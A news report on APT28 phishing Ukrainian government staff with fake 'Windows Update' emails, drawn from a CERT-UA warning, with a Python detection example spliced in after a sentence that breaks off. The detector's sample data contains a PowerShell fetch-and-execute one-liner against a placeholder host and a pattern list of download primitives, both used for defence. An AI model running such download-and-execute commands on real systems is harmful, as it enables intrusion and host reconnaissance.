Russian state-sponsored cybercriminal gang APT28, also known as Fancy Bear, has been targeting Ukrainian government organisations with malware hidden in fake Windows update emails. The phishing links are sent from Outlook email addresses that appear to be from employees of government organisations in Ukraine.
The Computer Emergency Response Team of Ukraine (CERT-UA) has released a warning concerning the attacks, explaining that they were carried out throughout April.
APT28 found attacking Ukrainian government
The emails would contain the subject line “Windows Update”, from email addresses created on the Outlook webmail service, but using real employee surnames and initials.
A sample letter described by CERT-UA contains instructions in Ukrainian for “updates to protect against hacker attacks,” as well as images of the process of launching a command line and executing a shell command.
“The mentioned command will download a PowerShell script that, simulating the process of updating the operating system, will download and execute a PowerShell script designed to collect basic information about the computer using the ‘tasklist’, ‘systeminfo’ commands,” the warning says.
CERT-UA recommends that any company feeling at risk from these attacks should restrict the ability of users to launch PowerShell/
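A defender-side check for the chain CERT-UA describes (PowerShell pulling down a script, then running tasklist and systeminfo) as an added example, not code from the original article or from CERT-UA: it walks constructed process-creation events and flags a PowerShell process whose command line carries a download primitive and which spawns host-recon children. The PIDs, image paths and the URL are placeholders.

```python
"""Flag the 'Windows Update' lure chain: PowerShell that downloads a script
and then spawns tasklist / systeminfo to profile the host.
The events below are CONSTRUCTED to resemble Sysmon Event ID 1 (process
creation) records; they are not real telemetry."""
import re
from collections import defaultdict

# Constructed events: (pid, ppid, image path, command line)
SAMPLE_EVENTS = [
    (400, 100, r"C:\Windows\explorer.exe", "explorer.exe"),
    (410, 400, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    (420, 410, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell.exe -c "iwr http://update.invalid/u.ps1 | iex"'),  # placeholder URL
    (430, 420, r"C:\Windows\System32\tasklist.exe", "tasklist"),
    (431, 420, r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    # Benign admin usage: PowerShell runs systeminfo but has no download stage
    (500, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -c Get-Date"),
    (510, 500, r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
]

# Common PowerShell download primitives seen in fetch-and-execute one-liners
DOWNLOAD_PRIMITIVES = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|net\.webclient|start-bitstransfer)", re.I)
# The recon commands named in the CERT-UA warning
RECON_IMAGES = {"tasklist.exe", "systeminfo.exe"}


def find_suspicious_chains(events):
    """Return PIDs of powershell.exe processes that (a) carry a download
    primitive in their command line and (b) spawn at least one recon child."""
    children = defaultdict(list)
    by_pid = {}
    for pid, ppid, image, cmdline in events:
        by_pid[pid] = (ppid, image, cmdline)
        children[ppid].append(pid)
    hits = []
    for pid, (_, image, cmdline) in by_pid.items():
        if image.lower().endswith("powershell.exe") and DOWNLOAD_PRIMITIVES.search(cmdline):
            # Basename of each child's image, lower-cased for comparison
            recon = {by_pid[c][1].rsplit("\\", 1)[-1].lower() for c in children[pid]}
            if recon & RECON_IMAGES:
                hits.append(pid)
    return hits


if __name__ == "__main__":
    for pid in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"suspicious PowerShell download + recon chain: pid {pid}")
```

The benign PowerShell process (pid 500) also runs systeminfo but is not flagged, because the rule requires both the download stage and the recon children.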
APT28 is a well-established cybercriminal gang
The Russian cybercriminal gang APT28, otherwise called Fancy Bear, Pawn Storm, the Sednit Gang and Sofacy, has been tracked widely by security companies since 2014.
In recent months it has been aggressively targeting Ukraine, as well as organisations in the US and Europe via the exploitation of a vulnerability in Cisco routers.
A joint advisory by the UK National Cybersecurity Centre, the National Security Agency, the Cybersecurity and Infrastructure Agency and the Federal Bureau of Investigation announced last month that “APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742”.
The cybersecurity agencies added that they believe that APT28 is almost certainly part of the Russian security force, the GRU.
Such operations are typical of the cyberattacks Ukraine has weathered during the war, explained Illia Vitiuk, the head of the Department of Cyber Information Security in the Security Service of Ukraine, during an interview last month with CyberScoop.
“More than 90% of all cyberattacks targeting Ukraine are either conducted by special services or by state-sponsored groups,” said Vitiuk. He went on to suggest that pro-Russian hacktivists were not as big a phenomenon as the cyber community has so far been led to believe.
“I believe that there is no so-called ‘hacktivism’ in Russia at all,” Vitiuk added.